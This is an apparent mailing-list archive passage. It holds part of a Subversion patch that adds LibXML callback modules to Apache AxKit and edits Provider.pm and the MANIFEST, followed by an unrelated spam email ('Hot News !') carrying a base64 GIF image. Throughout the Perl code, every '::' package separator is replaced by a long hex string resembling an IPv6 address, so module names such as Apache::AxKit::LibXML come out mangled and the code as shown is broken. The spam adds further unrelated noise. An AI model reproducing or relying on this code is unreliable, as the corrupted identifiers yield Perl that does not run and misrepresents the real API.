$XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blose_cb = \&close_uri; - $XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bopen_cb = \&open_uri; -} - -sub match_uri { - my $uri = shift; - AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(8, "LibXSLT match_uri: $uri"); - return 0 if $uri =~ /^(https?|ftp|file):/; # don't handle URI's supported by libxml - return 1 if !($uri =~ /^([a-zA-Z0-9]+):/); - return Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bProvideracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhas_protocol($1); -} - -sub open_uri { - my $uri = shift || './'; - return Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bProvideracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bget_uri($uri,AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpache->request(),$provider_cb); -} - -sub close_uri { - # do nothing -} - -sub read_uri { - return substr($_[0], 0, $_[1], ""); -} - -1; -__END__ - -=head1 NAME - -Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLSupport - XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML support routines - -=head1 SYNOPSIS - - require Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLSupport; - Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLSupport->setup_libxml(); - -=head1 DESCRIPTION - -This module sets up some things for using XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML in AxKit. Specifically this -is to do with callbacks. All callbacks look pretty much the same in AxKit, so -this module makes them editable in one place. - -=head1 API - -There is just one method: C<< Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLSupport->setup_libxml() >>. - -You can pass a parameter, in which case it is a callback to create a provider -given a C<$r> (an Apache request object). This is so that you can create the -provider in different ways and register the fact that it was created. If you -don't provide a callback though a default one will be provided. - -=cut Index: lib/Apache/AxKit/LibXML.pm =================================================================== --- lib/Apache/AxKit/LibXML.pm (revision 0) +++ lib/Apache/AxKit/LibXML.pm (revision 0) @@ -0,0 +1,42 @@ +# $Id$ + +package Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML; + +use strict; +use XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML 1.58; +use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLCallbacks; + +use vars qw( @ISA $VERSION ); + +@ISA = ('XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML'); +$VERSION = 1.0; + +sub new { + my $proto = shift; + my $class = ref( $proto ) || $proto; + my $self = $class->SUPERacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bnew( @_ ); + + $self->input_callbacks( Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLCallbacks->input_callbacks() ); + + return $self; +} + +1; +__END__ + +=head1 NAME + +Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML - XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML wrapper + +=head1 SYNOPSIS + + use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML; + my $parser = Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML->new(); + my $doc = $parser->parse_string( $xmlstring ); + +=head1 DESCRIPTION + +This module transparently registers the input callbacks from +Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLCallbacks for every parsing action. + +=cut Property changes on: lib/Apache/AxKit/LibXML.pm ___________________________________________________________________ Name: svn:keywords + Author Date Id Revision Index: lib/Apache/AxKit/LibXMLCallbacks.pm =================================================================== --- lib/Apache/AxKit/LibXMLCallbacks.pm (revision 0) +++ lib/Apache/AxKit/LibXMLCallbacks.pm (revision 0) @@ -0,0 +1,66 @@ +# $Id$ + +package Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLCallbacks; +use strict; +use XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML 1.50; +use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bProvider; + +use vars qw($provider_cb); + +sub input_callbacks { + my $class = shift; + my $icb = XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bInputCallback->new(); + $icb->register_callbacks( [ \&match_uri, \&open_uri, + \&read_uri, \&close_uri ] ); + return $icb; +} + +sub match_uri { + my $uri = shift; + AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(8, "LibXSLT match_uri: $uri"); + return 0 if $uri =~ /^(https?|ftp|file):/; # don't handle URI's supported by libxml + return 1 if !($uri =~ /^([a-zA-Z0-9]+):/); + return Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bProvideracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhas_protocol($1); +} + +sub open_uri { + my $uri = shift || './'; + return Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bProvideracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bget_uri($uri,AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpache->request(),$provider_cb); +} + +sub close_uri { + # do nothing +} + +sub read_uri { + return substr(${$_[0]}, 0, $_[1], ""); +} + +1; +__END__ + +=head1 NAME + +Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLCallbacks - XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML callback routines + +=head1 SYNOPSIS + + use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLCallbacks; + my $icb = Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLCallbacks->input_callbacks(); + +=head1 DESCRIPTION + +This module sets up some things for using XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML in AxKit. Specifically this +is to do with callbacks. All callbacks look pretty much the same in AxKit, so +this module makes them editable in one place. + +=head1 API + +There is just one method: C<< Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLCallbacks->setup_libxml() >>. + +You can pass a parameter, in which case it is a callback to create a provider +given a C<$r> (an Apache request object). This is so that you can create the +provider in different ways and register the fact that it was created. If you +don't provide a callback though a default one will be provided. + +=cut Property changes on: lib/Apache/AxKit/LibXMLCallbacks.pm ___________________________________________________________________ Name: svn:keywords + Author Date Id Revision Index: lib/Apache/AxKit/Provider.pm =================================================================== --- lib/Apache/AxKit/Provider.pm (revision 419205) +++ lib/Apache/AxKit/Provider.pm (working copy) @@ -19,6 +19,7 @@ use strict; use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bxception; +use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML; use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bConstants qw(OK DECLINED); use AxKit; @@ -82,7 +83,7 @@ my $str = get_provider(@_)->get_strref; - return $$str; + return $str; } # end of protocol utilities @@ -163,39 +164,36 @@ require Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLSupport; AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(8, "Provideracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bget_dom"); - my $parser = XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML->new(); + my $parser = Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML->new(); $parser->expand_entities(1); $parser->expand_xinclude(1); - local($XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bmatch_cb, $XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bopen_cb, - $XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bread_cb, $XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blose_cb); - Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXMLSupport->reset($parser); my $r = $self->apache_request(); my $xml_doc; if ($str) { - use bytes; + use bytes; AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(8, "Provideracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bget_dom/parse_string($str, ", $self->get_document_uri(), ")"); $xml_doc = $parser->parse_string($str, $self->get_document_uri()) || throw Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bxceptionacf:4db6:5e0b:f386:43a5:35d7:718d:3c8brror( -text => "XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML->parse_string returned nothing!" ); - } else { - eval { - my $fh = $self->get_fh(); - AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(8, "Provideracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bget_dom/parse_fh($fh, ", $self->get_document_uri(), ")"); - $xml_doc = $parser->parse_fh($fh, $self->get_document_uri()); - }; - if ($@) { - use bytes; - my $xmlstring = ${$self->get_strref()}; - AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(8, "Provideracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bget_dom/parse_strref($xmlstring, ", $self->get_document_uri(), ")"); - $xml_doc = $parser->parse_string($xmlstring, $self->get_document_uri()) || - throw Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bxceptionacf:4db6:5e0b:f386:43a5:35d7:718d:3c8brror( - -text => "XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML->parse_string returned nothing!" - ); - } - } + } else { + eval { + my $fh = $self->get_fh(); + AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(8, "Provideracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bget_dom/parse_fh($fh, ", $self->get_document_uri(), ")"); + $xml_doc = $parser->parse_fh($fh, $self->get_document_uri()); + }; + if ($@) { + use bytes; + my $xmlstring = ${$self->get_strref()}; + AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(8, "Provideracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bget_dom/parse_strref($xmlstring, ", $self->get_document_uri(), ")"); + $xml_doc = $parser->parse_string($xmlstring, $self->get_document_uri()) || + throw Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bxceptionacf:4db6:5e0b:f386:43a5:35d7:718d:3c8brror( + -text => "XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLibXML->parse_string returned nothing!" + ); + } + } return $xml_doc; } @@ -266,7 +264,7 @@ undef $pref_style; } - my @styles; + my @styles; my $key = $self->key(); # need to extract the following from the XML file: @@ -274,22 +272,22 @@ # DTD filename # Root element name (including namespace) # use three element array @$vals - - my ($doctype, $dtd, $root, $xml_styles) = $self->get_xml_info( $media, $pref_style ); - - $xml_styles = [] if $AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bg->IgnoreStylePI(); - - foreach my $style (@$xml_styles) { - $style->{title} ||= '#default'; - } - # Let GetMatchingProcessors to process the @$styles array - { - local $^W; # suppress "Use of uninitialized value" warnings - AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(4, "Calling GetMatchingProcessors with ($media, $pref_style, $doctype, $dtd, $root)"); - } + my ($doctype, $dtd, $root, $xml_styles) = $self->get_xml_info( $media, $pref_style ); + + $xml_styles = [] if $AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bg->IgnoreStylePI(); + + foreach my $style (@$xml_styles) { + $style->{title} ||= '#default'; + } + + # Let GetMatchingProcessors to process the @$styles array + { + local $^W; # suppress "Use of uninitialized value" warnings + AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(4, "Calling GetMatchingProcessors with ($media, $pref_style, $doctype, $dtd, $root)"); + } - @styles = $AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bg->GetMatchingProcessors($media, $pref_style, $doctype, $dtd, $root, $xml_styles, $self); + @styles = $AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bg->GetMatchingProcessors($media, $pref_style, $doctype, $dtd, $root, $xml_styles, $self); if (!@styles) { throw Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bxceptionacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blined( reason => "No styles defined for '$key'" ); @@ -325,34 +323,34 @@ } sub get_xml_info{ - my ($self, $media, $pref_style ) = @_; - - # This is where the sniffing of the xml content happens. - - my $r = $self->apache_request(); - my @ret; - eval{ - my $fh = $self->get_fh(); - my $pos = eval { tell $fh; }; - if($@) { - # fh is not seekable, thus we must slurp file at this point. - undef $@; - local($/) = undef; - my $string = <$fh>; - $r->pnotes('xml_string', $string); - @ret = parse_xml_info( $r, undef, \$string, $media, $pref_style); - } else { - # seekable. - @ret = parse_xml_info( $r, $fh, undef, $media, $pref_style); - seek $fh, 0, $pos; - } - }; - if($@) { - my $str_ref = $self->get_strref(); - $r->pnotes('xml_string', ${$str_ref}); - @ret = parse_xml_info( $r, undef, $str_ref, $media, $pref_style); - } - return @ret; + my ($self, $media, $pref_style ) = @_; + + # This is where the sniffing of the xml content happens. + + my $r = $self->apache_request(); + my @ret; + eval{ + my $fh = $self->get_fh(); + my $pos = eval { tell $fh; }; + if($@) { + # fh is not seekable, thus we must slurp file at this point. + undef $@; + local($/) = undef; + my $string = <$fh>; + $r->pnotes('xml_string', $string); + @ret = parse_xml_info( $r, undef, \$string, $media, $pref_style); + } else { + # seekable. + @ret = parse_xml_info( $r, $fh, undef, $media, $pref_style); + seek $fh, 0, $pos; + } + }; + if($@) { + my $str_ref = $self->get_strref(); + $r->pnotes('xml_string', ${$str_ref}); + @ret = parse_xml_info( $r, undef, $str_ref, $media, $pref_style); + } + return @ret; } sub parse_xml_info{ @@ -364,53 +362,53 @@ my $xml_styles = []; my $vals = []; - my @styles; + my @styles; - if (defined &Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bProvideracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bxs_get_styles_fh) { - AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(2, "using XS get_styles (libxml2)"); - my ($xs_styles, $doctype, $dtd, $root) = xs_get_styles($r, $fh, $str_ref, $media, $pref_style); - @$xml_styles = @$xs_styles unless $AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bg->IgnoreStylePI(); - @$vals = ($doctype, $dtd, $root); - } - else { - require XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bParser; + if (defined &Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bAxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bProvideracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bxs_get_styles_fh) { + AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(2, "using XS get_styles (libxml2)"); + my ($xs_styles, $doctype, $dtd, $root) = xs_get_styles($r, $fh, $str_ref, $media, $pref_style); + @$xml_styles = @$xs_styles unless $AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bg->IgnoreStylePI(); + @$vals = ($doctype, $dtd, $root); + } + else { + require XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bParser; - AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(4, "get_styles: creating XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bParser"); + AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(4, "get_styles: creating XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bParser"); - my $handlers = { - Start => \&parse_start, - Doctype => \&parse_dtd, - $AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bg->IgnoreStylePI() ? () : (Proc => \&parse_pi), - }; + my $handlers = { + Start => \&parse_start, + Doctype => \&parse_dtd, + $AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bg->IgnoreStylePI() ? () : (Proc => \&parse_pi), + }; - my $xml_parser = XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bParser->new( - Namespaces => 1, - ErrorContext => 2, - Handlers => $handlers, - ); + my $xml_parser = XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bParser->new( + Namespaces => 1, + ErrorContext => 2, + Handlers => $handlers, + ); - my $to_parse = $fh || ${$str_ref}; - #eval { - # $to_parse = $provider->get_fh(); - #}; - #if ($@) { - # $to_parse = ${ $provider->get_strref(); }; - #} - - AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(4, "get_styles: calling XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bParser->parse()"); - $xml_parser->parse( - $to_parse, - XMLStyle_preferred => $pref_style, - XMLStyle_media => $media, - XMLStyle_style => $xml_styles, - XMLStyle_vals => $vals, - XMLStyle_style_screen => [], - ); - - AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(4, "get_styles: parse returned successfully"); - } - - return (@$vals, $xml_styles); + my $to_parse = $fh || ${$str_ref}; + #eval { + # $to_parse = $provider->get_fh(); + #}; + #if ($@) { + # $to_parse = ${ $provider->get_strref(); }; + #} + + AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(4, "get_styles: calling XMLacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bParser->parse()"); + $xml_parser->parse( + $to_parse, + XMLStyle_preferred => $pref_style, + XMLStyle_media => $media, + XMLStyle_style => $xml_styles, + XMLStyle_vals => $vals, + XMLStyle_style_screen => [], + ); + + AxKitacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(4, "get_styles: parse returned successfully"); + } + + return (@$vals, $xml_styles); } sub xs_get_styles { Index: MANIFEST =================================================================== --- MANIFEST (revision 419205) +++ MANIFEST (working copy) @@ -142,7 +142,8 @@ lib/Apache/AxKit/Language/XSP/Preload.pm lib/Apache/AxKit/Language/XSP/SimpleTaglib.pm lib/Apache/AxKit/Language/XSP/TaglibHelper.pm -lib/Apache/AxKit/LibXMLSupport.pm +lib/Apache/AxKit/LibXMLCallbacks.pm +lib/Apache/AxKit/LibXML.pm lib/Apache/AxKit/Makefile.PL lib/Apache/AxKit/MediaChooser/WAPCheck.pm lib/Apache/AxKit/Plugin/Fragment.pm --------------030103080705090500020109-- From [email protected] Mon Jul 10 13:58:17 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97057 invoked from network); 10 Jul 2006 13:58:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Jul 2006 13:58:17 -0000 Received: (qmail 93027 invoked by uid 500); 10 Jul 2006 13:58:17 -0000 Delivered-To: [email protected] Received: (qmail 93024 invoked by uid 99); 10 Jul 2006 13:58:17 -0000 Received-SPF: neutral (hermes.apache.org: local policy) Received: from [161.129.204.104] (HELO 82-135-247-93.ip.zebra.lt) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 10 Jul 2006 06:58:17 -0700 Received: from [161.129.204.104] (helo=kgzgi.ztor) by 82-135-247-93.ip.zebra.lt with smtp (Exim 4.43) id 1Fzw2O-0002aR-8P; Mon, 10 Jul 2006 16:43:00 +0300 Message-ID: <[email protected]> From: "Anne Bryan" <[email protected]> To: <[email protected]> Subject: Hot News ! Date: Mon, 10 Jul 2006 16:39:11 +0300 MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_000_000D_01C6A43F.A463D9EB" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2900.2180 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This is a multi-part message in MIME format. ------=_NextPart_000_000D_01C6A43F.A463D9EB Content-Type: multipart/alternative; boundary="----=_NextPart_001_000E_01C6A43F.A463D9F6" ------=_NextPart_001_000E_01C6A43F.A463D9F6 Content-Type: text/plain; charset="windows-1252" Content-Transfer-Encoding: quoted-printable ------=_NextPart_001_000E_01C6A43F.A463D9F6 Content-Type: text/html; charset="windows-1252" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Dwindows-1252"> <META content=3D"MSHTML 6.00.2900.2180" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT face=3DArial size=3D2><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0></FONT></DIV></BODY></HTML> ------=_NextPart_001_000E_01C6A43F.A463D9F6-- ------=_NextPart_000_000D_01C6A43F.A463D9EB Content-Type: image/gif; name="vertebra.gif" Content-Transfer-Encoding: base64 Content-ID: <[email protected]> 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 